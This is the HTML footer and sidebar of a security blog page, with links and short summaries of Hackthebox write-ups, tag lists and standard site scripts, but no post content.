id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recent Update</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/oneliners/">Important One Liners</a><li><a href="/posts/hackthebox-epsilon/">Hackthebox: Epsilon</a><li><a href="/posts/hackthebox-unicode/">Hackthebox: Unicode</a><li><a href="/posts/hackthebox-timing/">Hackthebox: Timing</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/netutils/">netutils</a> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/open-redirect/">open-redirect</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/tar/">tar</a> <a class="post-tag" href="/tags/unicode-normalization/">unicode-normalization</a> <a class="post-tag" href="/tags/uniqid/">uniqid</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/hackthebox-timing/"><div class="card-body"> <em class="timeago small" date="2022-01-12 10:25:15 +0530" >Jan 12</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox: Timing</h3><div class="text-muted small"><p> Timing is a medium box from hackthebox which starts with finding a lfi vulnerability. The lfi vulnerability helps to get the code of upload.php page which has a filter to restrict malicious file up...</p></div></div></a></div><div class="card"> <a href="/posts/hackthebox-epsilon/"><div class="card-body"> <em class="timeago small" date="2022-04-24 10:25:15 +0530" >Apr 24</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hackthebox: Epsilon</h3><div class="text-muted small"><p> Epsilon from hackthebox is a easy to moderate box which starts with finding a .git folder which contains aws secret key. With that secret key, I found the secret phrase of jwt token in a aws lambda...</p></div></div></a></div><div class="card"> <a href="/posts/oneliners/"><div class="card-body"> <em class="timeago small" date="2022-04-29 15:30:00 +0530" >Apr 29</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Important One Liners</h3><div class="text-muted small"><p> Print all ports comma separated in one line 1 cat ports.nmap | grep -i open | awk -F\/ &#39;{print $1}&#39; | tr &#39;\n&#39; &#39;,&#39; | sed &#39;s/,$//g&#39;</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/hackthebox-timing/" class="btn btn-outline-primary" prompt="Older"><p>Hackthebox: Timing</p></a> <a href="/posts/hackthebox-epsilon/" class="btn btn-outline-primary" prompt="Newer"><p>Hackthebox: Epsilon</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/JMukhopdhyay">Joy Mukhopadhyay</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"></p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/aws/">aws</a> <a class="post-tag" href="/tags/netutils/">netutils</a> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/open-redirect/">open-redirect</a> <a class="post-tag" href="/tags/ssti/">ssti</a> <a class="post-tag" href="/tags/tar/">tar</a> <a class="post-tag" href="/tags/unicode-normalization/">unicode-normalization</a> <a class="post-tag" href="/tags/uniqid/">uniqid</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-MTM5B035QV"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-MTM5B035QV'); }); </script>
